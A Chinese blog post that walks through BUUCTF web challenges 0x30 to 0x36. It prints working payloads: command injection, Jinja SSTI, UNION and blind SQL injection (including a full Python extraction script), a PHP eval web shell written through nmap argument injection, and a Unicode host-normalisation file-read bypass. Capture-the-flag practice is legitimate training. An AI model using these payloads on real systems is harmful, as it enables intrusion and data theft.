<!DOCTYPE html>
<html lang="zh-cn" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="郁涛丶" />
  <meta name="description" content="" />
  
  
  <title>
    
      BUU_WEB刷题_0x30-0x3F 
      
      
      |
    
     郁涛丶&#39;s Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/color-scheme.css">
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">
<link rel="stylesheet" href="/css/comments.css">

  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="郁涛丶's Blog" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Ghostasky</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Categories</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


    <!-- LaTex Display -->

  
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>


        
            
                <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>



                    
                        
                                
                                        
                                                
                                                        
                                                            <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
                                                            <div class="container post-details" id="post-details">
                                                                <div class="post-content">
                                                                    <div class="post-title">
                                                                        BUU_WEB刷题_0x30-0x3F
                                                                    </div>
                                                                    <div class="post-attach">
                                                                        <span class="post-pubtime">
        <i class="iconfont icon-updatetime" title="Update time"></i>
        2021-09-16
      </span>

                                                                        <span class="post-pubtime"> 本文共4.1k字 </span>

                                                                        <span class="post-pubtime">
        大约需要29min
      </span>

                                                                        
                                                                                    <span class="post-categories">
        <i class="iconfont icon-bookmark" title="Categories"></i>
        
        <span class="span--category">
          <a href="/categories/Technology/" title="Technology">
            <b>#</b> Technology
          </a>
        </span>
                                                                                    
                                                                                        </span>
                                                                                        
                                                                            <span class="post-tags">
        <i class="iconfont icon-tags" title="Tags"></i>
        
        <span class="span--tag">
          <a href="/tags/WEB/" title="WEB">
            <b>#</b> WEB
          </a>
        </span>
                                                                            
                                                                                </span>
                                                                                
                                                                    </div>
                                                                    <div class="markdown-body">
                                                                        <p>[toc]</p>
<h1 id="0x30-WUSTCTF2020-朴实无华-审计"><a href="#0x30-WUSTCTF2020-朴实无华-审计" class="headerlink" title="0x30.[WUSTCTF2020]朴实无华(审计)"></a>0x30.[WUSTCTF2020]朴实无华(审计)</h1><p>robots找到个文件<code>fAke_f1agggg.php</code>，假的flag，查看头，找到fl4g.php。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">header(<span class="string">&#x27;Content-type:text/html;charset=utf-8&#x27;</span>);</span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line">highlight_file(<span class="keyword">__file__</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">//level 1</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$num</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;num&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(intval(<span class="variable">$num</span>) &lt; <span class="number">2020</span> &amp;&amp; intval(<span class="variable">$num</span> + <span class="number">1</span>) &gt; <span class="number">2021</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.&lt;/br&gt;&quot;</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;金钱解决不了穷人的本质问题&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;去非洲吧&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//level 2</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;md5&#x27;</span>]))&#123;</span><br><span class="line">   <span class="variable">$md5</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;md5&#x27;</span>];</span><br><span class="line">   <span class="keyword">if</span> (<span class="variable">$md5</span>==md5(<span class="variable">$md5</span>))</span><br><span class="line">       <span class="keyword">echo</span> <span class="string">&quot;想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.&lt;/br&gt;&quot;</span>;</span><br><span class="line">   <span class="keyword">else</span></span><br><span class="line">       <span class="keyword">die</span>(<span class="string">&quot;我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲&quot;</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;去非洲吧&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//get flag</span></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;get_flag&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$get_flag</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;get_flag&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!strstr(<span class="variable">$get_flag</span>,<span class="string">&quot; &quot;</span>))&#123;</span><br><span class="line">        <span class="variable">$get_flag</span> = str_ireplace(<span class="string">&quot;cat&quot;</span>, <span class="string">&quot;wctf2020&quot;</span>, <span class="variable">$get_flag</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.&lt;/br&gt;&quot;</span>;</span><br><span class="line">        system(<span class="variable">$get_flag</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;快到非洲了&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">&quot;去非洲吧&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>其中</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$num</span>=<span class="string">&#x27;1e10&#x27;</span>;</span><br><span class="line"><span class="keyword">echo</span> intval(<span class="variable">$num</span>);                    <span class="comment">// 1</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&lt;/br&gt;&#x27;</span>;</span><br><span class="line"><span class="keyword">echo</span> intval(<span class="variable">$num</span>+<span class="number">1</span>);                  <span class="comment">// 1410065409</span></span><br></pre></td></tr></table></figure>

<p>那么level1就很好绕过了。level2：弱类型绕过：<code>0e215962017</code></p>
<p>level3过滤了cat，可以使用tac，也过滤了空格，使用<code>$IFS$9</code>绕过</p>
<p>最终payload:<code>num=1e10&amp;md5=0e215962017&amp;get_flag=$IFS1ffffllllaaaggg</code></p>
<h1 id="0x31-WesternCTF2018-shrine-SSTI"><a href="#0x31-WesternCTF2018-shrine-SSTI" class="headerlink" title="0x31.[WesternCTF2018]shrine(SSTI)"></a>0x31.[WesternCTF2018]shrine(SSTI)</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> flask</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">app = flask.Flask(__name__)</span><br><span class="line"></span><br><span class="line">app.config[<span class="string">&#x27;FLAG&#x27;</span>] = os.environ.pop(<span class="string">&#x27;FLAG&#x27;</span>)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span>():</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">open</span>(__file__).read()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/shrine/&lt;path:shrine&gt;&#x27;</span></span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">shrine</span>(<span class="params">shrine</span>):</span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">safe_jinja</span>(<span class="params">s</span>):</span></span><br><span class="line">        s = s.replace(<span class="string">&#x27;(&#x27;</span>, <span class="string">&#x27;&#x27;</span>).replace(<span class="string">&#x27;)&#x27;</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">        blacklist = [<span class="string">&#x27;config&#x27;</span>, <span class="string">&#x27;self&#x27;</span>]</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>.join([<span class="string">&#x27;&#123;&#123;% set &#123;&#125;=None%&#125;&#125;&#x27;</span>.<span class="built_in">format</span>(c) <span class="keyword">for</span> c <span class="keyword">in</span> blacklist]) + s</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> flask.render_template_string(safe_jinja(shrine))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(debug=<span class="literal">True</span>)</span><br></pre></td></tr></table></figure>

<p><code>&#123;&#123;7*7&#125;&#125;</code>发现有SSTI</p>
<p>注册了一个名字为<code>FLAG</code>的config，同时这个题目把<code>(),config,self</code>都过滤掉了，并且黑名单设置的时候，替换为空。</p>
<p>那么可以使用python的内置函数<code>url_for</code>和<code>get_flashed_messages</code></p>
<p><code>url_for.__globals__</code>发现：<code>&#39;current_app&#39;: &lt;Flask &#39;app&#39;&gt;</code></p>
<p><code>current_app</code>就是当前下的app，接下来查看当前app下的config</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/shrine/&#123;&#123;url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>].config&#125;&#125;</span><br><span class="line"><span class="keyword">or</span> </span><br><span class="line">/shrine/&#123;&#123;url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>].config.FLAG&#125;&#125;</span><br></pre></td></tr></table></figure>



<h1 id="0x32-SWPU2019-Web1-无列名注入"><a href="#0x32-SWPU2019-Web1-无列名注入" class="headerlink" title="0x32.[SWPU2019]Web1(无列名注入)"></a>0x32.[SWPU2019]Web1(无列名注入)</h1><blockquote>
<p>  <a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/193512">https://www.anquanke.com/post/id/193512</a></p>
<p>  information_schema被waf，无列名注入</p>
</blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">无列名注入</span><br><span class="line"><span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users;</span><br><span class="line"><span class="operator">/</span><span class="operator">/</span> 使用这个语句，前面的<span class="keyword">select</span> <span class="number">1</span>，<span class="number">2</span>，<span class="number">3</span> 会变成列名。如果此时我们再使用下面的语句</span><br><span class="line">slecet <span class="number">2</span> form (<span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> users)a; </span><br><span class="line"><span class="operator">/</span><span class="operator">/</span> 就可以得到我们的第二列的所有数据</span><br></pre></td></tr></table></figure>

<p>通过测试发现过滤了空格，or和注释符号，这样orderby和information_schema都使用不了了。</p>
<p>information_schema使用不了可以使用InnoDb引擎或者sys数据库</p>
<blockquote>
<p>  从MYSQL5.5.8开始，InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中，inndb增加了innodb_index_stats和innodb_table_stats两张表，这两张表中都存储了数据库和其数据表的信息，但是没有存储列名。</p>
<p>  在5.7以上的MYSQL中，新增了sys数据库，该库的基础数据来自information_schema和performance_chema，其本身不存储数据。可以通过其中的schema_auto_increment_columns来获取表名。</p>
<p>  sys库需要root权限才能访问。innodb在mysql中是默认关闭的。</p>
</blockquote>
<p>空格可以用内联&#x2F;**&#x2F;来绕过</p>
<p>经过测试发现有22个字段，回显在2和3：</p>
<blockquote>
<p>  -1’&#x2F;**&#x2F;UNION&#x2F;**&#x2F;SELECT&#x2F;**&#x2F;1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22’</p>
</blockquote>
<p>比赛中bypass <code>information_schema</code>是用的<code>sys.schema_auto_increment_columns</code>，但是buu平台没有这个库。</p>
<p>还有一个方法：</p>
<p>innodb</p>
<ul>
<li>表引擎为innodb</li>
<li>MySQL&gt; 5.5</li>
<li>innodb_ table_stats、 innodb_table_index存 放所有库名表名</li>
<li><code>select table_name from mysql.innodb_table_stats where database_ name=库名</code>;</li>
</ul>
<p>这个方法在buu也不行。。。</p>
<p>所以只能无列名注入：</p>
<p>使用innodb绕过：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27;/**/union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()&amp;&amp;&#x27;1&#x27;=&#x27;1</span><br></pre></td></tr></table></figure>

<p>查到有ads和users两张表。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27;/**/union/**/select/**/1,(select/**/group_concat(`2`)/**/from/**/(select/**/1,2,3/**/union/**/select*from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&amp;&amp;&#x27;1&#x27;=&#x27;1</span><br></pre></td></tr></table></figure>

<p>查看另一列</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-1&#x27;/**/union/**/select/**/1,(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select*from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&amp;&amp;&#x27;1&#x27;=&#x27;1</span><br></pre></td></tr></table></figure>

<h1 id="0x33-网鼎杯-2020-朱雀组-Nmap"><a href="#0x33-网鼎杯-2020-朱雀组-Nmap" class="headerlink" title="0x33.[网鼎杯 2020 朱雀组]Nmap"></a>0x33.[网鼎杯 2020 朱雀组]Nmap</h1><p>使用的是nmap，提示在&#x2F;flag中，所以可以写入到文件：</p>
<p><code>&#39; -iL /flag -oN flag.txt &#39;</code></p>
<p>解法二：</p>
<p><code>&#39; &lt;?php @eval($_POST[&quot;hack&quot;]);?&gt; -oG hack.php &#39;</code></p>
<p>回显了hacker</p>
<p><code>&#39; &lt;?= @eval($_POST[&quot;hack&quot;]);?&gt; -oG hack.phtml &#39;</code></p>
<p>可以访问，蚁剑就OK。</p>
<h1 id="0x34-SUCTF-2019-Pythonginx"><a href="#0x34-SUCTF-2019-Pythonginx" class="headerlink" title="0x34.[SUCTF 2019]Pythonginx"></a>0x34.[SUCTF 2019]Pythonginx</h1><blockquote>
<p>  知识点：</p>
<ol>
<li><p>blackhat2019的一个议题：<a target="_blank" rel="noopener" href="https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf">https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf</a></p>
<p>大致就是说假如<a href="http://evil.c℀.com经过处理会变成http://evil.ca/c.com">http://evil.c℀.com经过处理会变成http://evil.ca/c.com</a></p>
</li>
<li><p>在unicode中字符℀(U+2100)，当IDNA处理此字符时，会将℀变成a&#x2F;c，因此当你访问此url时，dns服务器会自动将url重定向到另一个网站。如果服务器引用前端url时，只对域名做了限制，那么通过这种方法，我们就可以轻松绕过服务器对域名的限制了。</p>
</li>
<li><p><strong>CVE-2019-9636：urlsplit不处理NFKC标准化</strong></p>
</li>
<li><p>Nginx重要文件的位置</p>
</li>
</ol>
</blockquote>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">nginx重要文件位置</span><br><span class="line">配置文件存放目录：/etc/nginx</span><br><span class="line">主配置文件：/etc/nginx/conf/nginx.conf</span><br><span class="line">管理脚本：/usr/lib64/systemd/system/nginx.service</span><br><span class="line">模块：/usr/lisb64/nginx/modules</span><br><span class="line">应用程序：/usr/sbin/nginx</span><br><span class="line">程序默认存放位置：/usr/share/nginx/html</span><br><span class="line">日志默认存放位置：/var/log/nginx</span><br><span class="line">配置文件目录为：/usr/local/nginx/conf/nginx.conf</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">        @app.route(<span class="params"><span class="string">&#x27;/getUrl&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getUrl</span>():</span></span><br><span class="line">    url = request.args.get(<span class="string">&quot;url&quot;</span>)</span><br><span class="line">    host = parse.urlparse(url).hostname</span><br><span class="line">    <span class="keyword">if</span> host == <span class="string">&#x27;suctf.cc&#x27;</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;我扌 your problem? 111&quot;</span></span><br><span class="line">    parts = <span class="built_in">list</span>(urlsplit(url))</span><br><span class="line">    host = parts[<span class="number">1</span>]</span><br><span class="line">    <span class="keyword">if</span> host == <span class="string">&#x27;suctf.cc&#x27;</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;我扌 your problem? 222 &quot;</span> + host</span><br><span class="line">    newhost = []</span><br><span class="line">    <span class="keyword">for</span> h <span class="keyword">in</span> host.split(<span class="string">&#x27;.&#x27;</span>):</span><br><span class="line">        newhost.append(h.encode(<span class="string">&#x27;idna&#x27;</span>).decode(<span class="string">&#x27;utf-8&#x27;</span>))</span><br><span class="line">    parts[<span class="number">1</span>] = <span class="string">&#x27;.&#x27;</span>.join(newhost)</span><br><span class="line">    <span class="comment">#去掉 url 中的空格</span></span><br><span class="line">    finalUrl = urlunsplit(parts).split(<span class="string">&#x27; &#x27;</span>)[<span class="number">0</span>]</span><br><span class="line">    host = parse.urlparse(finalUrl).hostname</span><br><span class="line">    <span class="keyword">if</span> host == <span class="string">&#x27;suctf.cc&#x27;</span>:</span><br><span class="line">        <span class="keyword">return</span> urllib.request.urlopen(finalUrl).read()</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;我扌 your problem? 333&quot;</span></span><br></pre></td></tr></table></figure>

<p>进行了三次判断，最后一次过了之后才会执行读取文件的操作。</p>
<p>问题就出现在第二次和第三次判断的中间：<code>newhost.append(h.encode(&#39;idna&#39;).decode(&#39;utf-8&#39;))</code></p>
<p>所以在第三个必须等于suctf.cc</p>
<p>可用payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">file://suctf.cℭ/usr/local/nginx/conf/nginx.conf</span><br><span class="line">file://sucⓉf.cc/usr/local/nginx/conf/nginx.conf</span><br></pre></td></tr></table></figure>

<h1 id="0x35-MRCTF2020-PYWebsite"><a href="#0x35-MRCTF2020-PYWebsite" class="headerlink" title="0x35.[MRCTF2020]PYWebsite"></a>0x35.[MRCTF2020]PYWebsite</h1><p>看源码发现有前段的验证(没卵用)，flag.php进去之后提示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;h1&gt;拜托，我也是学过半小时网络安全的，你骗不了我！&lt;/h1&gt;&lt;p&gt;我已经把购买者的IP保存了，显然你没有购买&lt;/p&gt;&lt;p&gt;验证逻辑是在后端的，除了购买者和我自己，没有人可以看到flag&lt;/p&gt;&lt;a href=&quot;index.html&quot; &gt;还不快去买&lt;/p&gt;&lt;</span><br></pre></td></tr></table></figure>

<p>真正的验证在后端。</p>
<p>购买者和自己，可以伪造成本地访问，加X-Forwarded-For头得到flag</p>
<h1 id="0x36-极客大挑战-2019-FinalSQL-盲注"><a href="#0x36-极客大挑战-2019-FinalSQL-盲注" class="headerlink" title="0x36.[极客大挑战 2019]FinalSQL(盲注)"></a>0x36.[极客大挑战 2019]FinalSQL(盲注)</h1><p>依次点12345，然后测试id&#x3D;6的时候返回<code>Clever! But not this table.</code>，7以上报error</p>
<p>注入点在id，过滤了一部分内容，盲注，直接上脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://b392895c-24a8-4369-9d79-e4d112a0d249.node4.buuoj.cn:81/search.php?id=&#x27;</span></span><br><span class="line">i = <span class="number">0</span></span><br><span class="line">flag = <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    i += <span class="number">1</span></span><br><span class="line">    <span class="comment"># 从可打印字符开始</span></span><br><span class="line">    begin = <span class="number">32</span></span><br><span class="line">    end = <span class="number">126</span></span><br><span class="line">    tmp = (begin + end) // <span class="number">2</span></span><br><span class="line">    <span class="keyword">while</span> begin &lt; end:</span><br><span class="line">        <span class="comment">#print(begin, tmp, end)</span></span><br><span class="line">        time.sleep(<span class="number">0.1</span>)</span><br><span class="line">        <span class="comment"># 爆数据库:geek</span></span><br><span class="line">        <span class="comment"># payload = &quot;&#x27;&#x27;or(ascii(substr(database(),%d,1))&gt;%d)&quot; % (i, tmp)</span></span><br><span class="line">        <span class="comment"># 爆表: F1naI1y,Flaaaaag</span></span><br><span class="line">        <span class="comment">#payload = &quot;&#x27;&#x27;or(ascii(substr((select(GROUP_CONCAT(TABLE_NAME))from(information_schema.tables)where(TABLE_SCHEMA=database())),%d,1))&gt;%d)&quot; % (i, tmp)</span></span><br><span class="line">        <span class="comment"># 爆字段</span></span><br><span class="line">        <span class="comment"># F1naI1y: id,username,password</span></span><br><span class="line">        <span class="comment"># Flaaaaag:id,fl4gawsl</span></span><br><span class="line">        <span class="comment"># payload = &quot;&#x27;&#x27;or(ascii(substr((select(GROUP_CONCAT(COLUMN_NAME))from(information_schema.COLUMNS)where(TABLE_NAME=&#x27;Flaaaaag&#x27;)),%d,1))&gt;%d)&quot; % (i, tmp)</span></span><br><span class="line">        <span class="comment"># 爆flag 要跑很久</span></span><br><span class="line">        payload = <span class="string">&quot;&#x27;&#x27;or(ascii(substr((select(group_concat(username))from(F1naI1y)),%d,1))&gt;%d)&quot;</span> % (i, tmp)</span><br><span class="line">        <span class="comment"># 爆flag 很快</span></span><br><span class="line">        <span class="comment">#payload = &quot;&#x27;&#x27;or(ascii(substr((select(password)from(F1naI1y)where(username=&#x27;flag&#x27;)),%d,1))&gt;%d)&quot; % (i, tmp)</span></span><br><span class="line">        r = requests.get(url+payload)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;Click&#x27;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">            begin = tmp + <span class="number">1</span></span><br><span class="line">            tmp = (begin + end) // <span class="number">2</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            end = tmp</span><br><span class="line">            tmp = (begin + end) // <span class="number">2</span></span><br><span class="line"></span><br><span class="line">    flag += <span class="built_in">chr</span>(tmp)</span><br><span class="line">    <span class="built_in">print</span>(flag)</span><br><span class="line">    <span class="keyword">if</span> begin == <span class="number">32</span>:</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>password里面垃圾东西很多，可以先查username然后查password</p>
